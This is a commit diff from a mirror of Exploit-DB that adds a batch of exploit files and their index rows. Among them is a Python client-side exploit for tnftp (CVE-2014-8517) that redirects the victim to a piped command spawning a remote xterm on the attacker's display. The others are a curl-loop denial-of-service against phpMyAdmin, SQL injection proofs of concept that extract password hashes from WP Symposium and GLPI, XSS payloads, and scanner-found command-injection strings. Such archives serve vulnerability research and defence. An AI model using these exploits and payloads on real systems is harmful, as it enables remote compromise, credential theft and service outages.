bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_16_2014

Browse source
This commit is contained in:
Offensive Security 2014-12-16 04:49:38 +00:00
parent 8da471b3fa
commit b4ae4f9045
21 changed files with 1587 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
files.csv
View file

@ -31292,7 +31292,7 @@ id,file,description,date,author,platform,type,port
34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
@ -31912,6 +31912,7 @@ id,file,description,date,author,platform,type,port
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@ -31980,6 +31981,7 @@ id,file,description,date,author,platform,type,port
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0
35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
@ -31992,3 +31994,21 @@ id,file,description,date,author,platform,type,port
35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
35520,platforms/php/webapps/35520.txt,"Claroline 1.10 Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0
35521,platforms/php/webapps/35521.txt,"osCSS 2.1 Cross Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0
35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x 'cms_username' Cross Site Scripting Vulnerability",2011-03-29,"High-Tech Bridge SA",php,webapps,0
35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross Site Scripting Vulnerability",2011-03-29,"Mesut Timur",php,webapps,0
35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross Site Scripting Vulnerability",2011-03-29,KedAns-Dz,php,webapps,0
35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 'lng' Parameter Multiple SQL Injection Vulnerabilities",2011-03-30,"kurdish hackers team",php,webapps,0
35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCms Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0
35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0
35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0

Can't render this file because it is too large.

148
platforms/bsd/remote/35427.py Executable file
View file

@ -0,0 +1,148 @@
#!/usr/bin/env python2
#
# Exploit Title: [tnftp BSD exploit]
# Date: [11/29/2014]
# Exploit Author: [dash]
# Vendor Homepage: [www.freebsd.org]
# Version: [FreeBSD 8/9/10]
# Tested on: [FreeBSD 9.3]
# CVE : [CVE-2014-8517]
# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
#
# 29 Nov 2014 by dash@hack4.org
#
# usage:
#
# redirect the vulnerable ftp client requests for http to your machine
#
# client will do something like:
# ftp http://ftp.freebsd.org/data.txt
#
# you will intercept the dns request and redirect victim to your fake webserver ip
#
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1
# probably do also xhost+victimip
#
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
#
# sadly you cannot put a slash behind the | also www-encoded is not working
# plus problems with extra pipes
# this renders a lot of usefull commands useless
# so xterm -display it was ;)
#
# *dirty* *dirdy* *dyrdy* *shell* !
#
import os
import sys
import time
import socket
def usage():
print "CVE-2014-8517 tnftp exploit"
print "by dash@hack4.org in 29 Nov 2014"
print
print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
#bind a fake webserver on 0.0.0.0 port 80
def webserveRedirect(redirect):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0",80))
s.listen(3)
h, c = s.accept()
#wait for request
#print h.recv(1024)
#send 302
print "[+] Sending redirect :>"
h.send(redirect)
s.close()
return 0
#bind a fake webserver on port %rport
def deliverUgga(owned):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0",rport))
s.listen(3)
h, c = s.accept()
# print h.recv(1024)
print "[+] Deliver some content (shell is spwaned now)"
h.send(owned)
s.close()
return 0
owned="""HTTP/1.1 200 Found
Date: Fri, 29 Nov 2014 1:00:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5
Connection: close
Content-Type: text/html; charset=iso-8859-1
ugga ugga
"""
if(os.getuid())!=0:
print "[-] Sorry, you need root to bind port 80!"
sys.exit(1)
if len(sys.argv)<3:
usage()
sys.exit(1)
rip = sys.argv[1]
rport = int(sys.argv[2])
revip = sys.argv[3]
print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
print "[+] Dont forget to run Xnest -ac :1"
# ok, lets use xterm -display
cmd = "xterm -display %s:1" % (revip)
cmd = cmd.replace(" ","%20")
print "[+] Payload: [%s]" % cmd
redirect = "HTTP/1.1 302\r\n"\
"Content-Type: text/html\r\n"\
"Connection: keep-alive\r\n"\
"Location: http://%s:%d/cgi-bin/|%s\r\n"\
"\r\n\r\n" % (rip,rport,cmd)
#child process owned data delivery
uggapid = os.fork()
if uggapid == 0:
uggapid = os.getpid()
deliverUgga(owned)
else:
#child proces for webserver redirect
webpid = os.fork()
if webpid == 0:
webpid = os.getpid()
webserveRedirect(redirect)
#childs, come home!
try:
os.waitpid(webpid,0)
except:
pass
try:
os.waitpid(uggapid,0)
except:
pass
#oh wait :>
time.sleep(5)

42
platforms/php/dos/35539.txt Executable file
View file

@ -0,0 +1,42 @@
=============
DESCRIPTION:
=============
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to
cause a denial of service (resource consumption) via a long password.
CVE-2014-9218 was assigned
=============
Time Line:
=============
December 3, 2014 - A phpMyAdmin update and the security advisory is
published.
=============
Proof of Concept:
=============
*1 - Create the payload.*
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
{1..1000000} >> payload
*2 - Performing the Denial of Service attack.*
$ for i in `seq 1 150`; do (curl --data @payload
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
=============
Authors:
=============
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============
References:
====================================================================
*
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php

35
platforms/php/webapps/35505.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: WP Symposium 14.10 SQL Injection
# Date: 22-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
# Category: webapps
# CVE: CVE-2014-8810
1. Description
$_POST['tray'] is not escaped.
File: wp-symposium\ajax\mail_functions.php
$tray = $_POST['tray'];
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
2. Proof of Concept
Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
<input type="hidden" name="action" value="getMailMessage">
Message ID: <input type="text" name="mid"><br />
SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
<input type="submit" value="Inject">
</form>
Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
3. Solution:
Update to version 14.11
http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip

9
platforms/php/webapps/35520.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47073/info
Claroline is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Claroline 1.10 is vulnerable; other versions may also be affected.
"><script>alert(0)</script>

19
platforms/php/webapps/35521.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/47074/info
osCSS is prone to a cross-site scripting vulnerability and multiple local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
osCSS 2.1.0 RC12 is vulnerable; other versions may also be affected.
Cross-site scripting:
http://www.example.com/oscss2/admin108/editeur/tiny_mce/plugins/tinybrowser/upload.php?feid=%22);alert(0);//
Local file include:
http://www.example.com/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

10
platforms/php/webapps/35522.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47077/info
Spitfire is prone to a cross-site scripting vulnerability. because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
[code]
GET / HTTP/1.1
Cookie: cms_username=admin">[xss]<
[/code]

9
platforms/php/webapps/35523.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47078/info
Tracks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Tracks 1.7.2 is vulnerable; other versions may also be affected.
http://example.com/todos/tag/&#039;"--></style></script><script>alert(0x000238)</script>

7
platforms/php/webapps/35524.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47085/info
XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script>

11
platforms/php/webapps/35525.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47086/info
GuppY is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
GuppY 4.6.14 is vulnerable; other versions may also be affected.
http://www.example.com/links.php?lng=fr [sql Injection]
http://www.example.com/guestbk.php?lng=fr [sql Injection]
http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection]

96
platforms/php/webapps/35526.txt Executable file
View file

@ -0,0 +1,96 @@
source: http://www.securityfocus.com/bid/47089/info
YaCOMAS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
YaCOMAS 0.3.6 is vulnerable; other versions may also be affected.
===================================================================
YaCOMAS 0.3.6 Multiple vulnerability
===================================================================
Software: Yacomas 0.3.6
Vendor: http://yacomas.sourceforge.net/
Vuln Type: Multiple Vulnerability
Download link: http://patux.net/downloads/yacomas-0.3.6_alpha.tar.gz
Author: Pr@fesOr X
contact: profesor_x(at)otmail.com
Home: www.ccat.edu.mx
Company: Centro de Investigaciones en Alta Tecnologia
=========================
--Description XSS --
=========================
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
===============================
--= Attack details No. 1 =--
===============================
This vulnerability affects /yacomas/asistente/index.php.
http://www.site.com/yacomas/asistente/index.php?opc=1
--URL encoded POST input S_apellidos was set to " onmouseover=prompt(11111111111) bad="
--The input is reflected inside a tag element between double quotes.
--details: can you inyect this in the HTTP headers whit this data:
-----------------------
C_sexo=M&I_b_day=0&I_b_month=0&I_b_year=0&I_id_estado=0&I_id_estudios=0&I_id_tasistente=0&S_apellidos=%22%20onmouseover%3dprompt%2811111111111%29%20bad%3d%22&S_ciudad=&S_login=oijclpgk&S_mail=hola@ccat.edu.mx.tst&S_nombrep=oijclpgk&S_org=&S_passwd=rodolfo&S_passwd2=rodolfo&submit=Registrarme
------------------------
===============================
--= Vulnerable forms and variables =--
===============================
S_apellidos
s_ciudad
s_login
s_mail
s_nombrep
s_org
===============================
--= Attack XSS details No. 2 =--
===============================
http://www.site.com/yacomas/admin/index.php
--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
------------------------------------------
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
-------------------------------------------------------------------
==========================================
--= Attack XSS remote code execution No. 2 =--
==========================================
http://www.site.com/yacomas/admin/index.php
--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
------------------------------------------
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
-------------------------------------------------------------------

40
platforms/php/webapps/35528.txt Executable file
View file

@ -0,0 +1,40 @@
# Exploit Title: GLPI 0.85 Blind SQL Injection
# Date: 28-11-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
# CVE: CVE-2014-9258
# Category: webapps
1. Description
$_GET['condition'] is not escaped correctly.
File: ajax\getDropdownValue.php
if (isset($_GET['condition']) && !empty($_GET['condition'])) {
$_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
}
if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
$where .= " AND ".$_GET['condition']." ";
}
$query = "SELECT `$table`.* $addselect
FROM `$table`
$addjoin
$where
ORDER BY $add_order `$table`.`completename`
$LIMIT";
if ($result = $DB->query($query)) {
}
http://security.szurek.pl/glpi-085-blind-sql-injection.html
2. Proof of Concept
http://glpi-url/ajax/getDropdownValue.php?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)
3. Solution:
Update to version 0.85.1
http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz

655
platforms/php/webapps/35541.txt Executable file
View file

@ -0,0 +1,655 @@
?Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Injection Vulnerabilities
Author: Adler Freiheit
Discovered: 11 June 2014
Updated: 11 December 2014
Published: 11 December 2014
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 6.4.5976 and prior
Status: Unpatched
Vulnerable scripts:
/pages/themes.php
/pages/preview.php
/pages/help.php
/pages/search.php
/pages/user_password.php
/pages/user_request.php
(and probably others)
Description:
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL
injection attacks, and insecure cookie handling. The scripts fail to
properly sanitize user-supplied input, check the network protocol used
to access the site.
Vulnerability: SC­1414
Name: Cross Site Scripting (XSS)
Type: Application
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 6 Oct 2014
Service: tcp/https:443
Severity: 4
Risk: 40
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
Resolution Effort: 3
Description:
This web application is vulnerable to Cross Site Scripting (XSS).
XSS is caused when an application echoes user controllable input data
back to the browser without first sanitising or escaping dangerous
characters. Unescaped strings are then interpreted or executed by the
browser as script, just as if they had originated from the web server.
Malicious script is sent by the attacker via the vulnerable web
application and executed on the victims browser, within the context of
that user and may be used to steal session information, redirect users
to a malicious site, and even steal credentials in a Phishing attack.
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
http://cwe.mitre.org/data/definitions/79.html
Solution:
Validate all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) against expected Type,
Length and where possible, Format and Range characteristics. Reject
any data that fails validation.
Sanitise all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) by converting potentially
dangerous characters (listed below) into HTML entities such as > < etc
using output encoding.
By combining proper input validation with effective input sanitisation
and output encoding, Cross Site Scripting vulnerabilities will be
mitigated.
[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)
[9] / (forward slash)
[10] | (pipe)
[11] [] (square brackets)
[12] : (colon)
Information
URI: /pages/preview.php
Parameter: sort (GET)
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>
Vulnerability: 44967
Name: CGI Generic Command Execution (time­based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5
Description:
The remote web server hosts CGI scripts that fail to adequately
sanitize request strings. By leveraging this issue, an attacker may be
able to execute arbitrary commands on the remote host.
Note that this script uses a time­based detection method which is less
reliable than the basic method.
Solution:
Restrict access to the vulnerable application. Contact the
vendor for a patch or upgrade.
Information:
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to arbitrary command
execution (time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%26%20ping%20­n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20­n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20­n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%20ping%20­n%203%20127.0.0.1%20%7C
References:
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 74
CWE: 77
CWE: 78
-----------------------------------------------------------------------------------------------------
Vulnerability: 43160
Name: CGI Generic SQL Injection (blind, time based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5
Description
By sending specially crafted parameters to one or more CGI scripts
hosted on the remote web server, Nessus was able to get a slower
response, which suggests that it may have been able to modify the
behavior of the application and directly access the underlying
database.
An attacker may be able to exploit this issue to bypass
authentication, read confidential data, modify the remote database, or
even take control of the remote operating system.
Note that this script is experimental and may be prone to false positives.
Solution:
Modify the affected CGI scripts so that they properly escape arguments.
Information:
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to blind SQL injection
(time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20­­%20
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
References
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 751
CWE: 77
CWE: 801
CWE: 810
CWE: 89
---------------------------------------------------------------------------------------------------------------
Vulnerability: 55903
Name: CGI Generic XSS (extended patterns)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 4.3
Description
The remote web server hosts one or more CGI scripts that fail to
adequately sanitize request strings with malicious JavaScript. By
leveraging this issue, an attacker may be able to cause arbitrary HTML
and script code to be executed in a user's browser within the security
context of the affected site. These XSS vulnerabilities are likely to
be 'non­persistent' or 'reflected'.
Solution
Restrict access to the vulnerable application. Contact the vendor for
a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cross­site scripting+
The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
(extended patterns) :
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
ew</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
ew</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&fro
m=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b
y=&from=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&fro
m=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
Tonbridge & Malling Borough Council
Vulnerabilities Report | 5
a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert
(504);&from=
